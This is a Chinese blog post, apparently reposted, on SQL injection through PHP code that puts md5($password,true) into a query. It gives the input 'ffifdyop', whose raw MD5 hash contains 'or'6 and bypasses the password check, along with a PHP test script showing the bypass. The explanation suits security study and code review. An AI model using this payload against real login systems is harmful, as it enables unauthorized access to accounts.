md5($str,true)注入
来源:互联网 发布:腾讯tim ubuntu 编辑:程序博客网 时间:2024/05/22 03:07
今天看到 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这样一个sql,其实可以注入。
思路比较明确,当md5后的hex转换成字符串后,如果包含 ‘or’ 这样的字符串,那整个sql变成
SELECT * FROM admin WHERE pass = ''or'6<trash>'很明显可以注入了。
难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。
提供一个字符串:ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串: ‘or’6
测试代码:
<?php error_reporting(0);$link = mysql_connect('localhost', 'root', '');if (!$link) { die('Could not connect to MySQL: ' . mysql_error()); } // 选择数据库$db = mysql_select_db("test", $link);if(!$db){ echo 'select db error'; exit();}// 执行sql$password = "ffifdyop";$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";var_dump($sql);$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );$row1 = mysql_fetch_row($result);var_dump($row1);mysql_close($link);?>
阅读全文
0 0
- md5($str,true)注入
- sql 中的STR()
- str.getBytes()用法
- spring 依赖对象的注入方式(3种) 和 公共属性的设置abstract="true" parent
- str
- str()
- str
- str
- str
- MD5加密后的SQL 注入
- MD5加密下的SQL注入
- Word Pattern pattern = "abba", str = "dog cat cat dog" should return true
- 给定字符串 str,检查其是否包含数字,包含返回 true,否则返回 false
- java实用方法系列 new Boolean(str)什么时候返回true或false
- 关于order by注入利用rand(true)的一个疑问
- while(true){break};
- TRUE
- repr() , print () str
- TF-IDF 加权及其应用
- android 64位机子兼容32位so包的操作
- java21个知识点重点
- 安卓开发-多线程常规实现+xUtils-master开源框架实现 断点下载
- 树状数组学习
- md5($str,true)注入
- SSH框架之spring整合javamail实现邮件服务
- android studio 在gradle 中配置签名文件
- 20170917_关键字restrict的含义
- jdk 调用http https/请求
- 《Python语言及其应用》读书笔记(5)之第6章对象和类(关键词:对象/类)
- js 防止表单重复提交
- ssh框架spring 简单应用
- sts eclipse 反编译插件免安装 解压就可使用
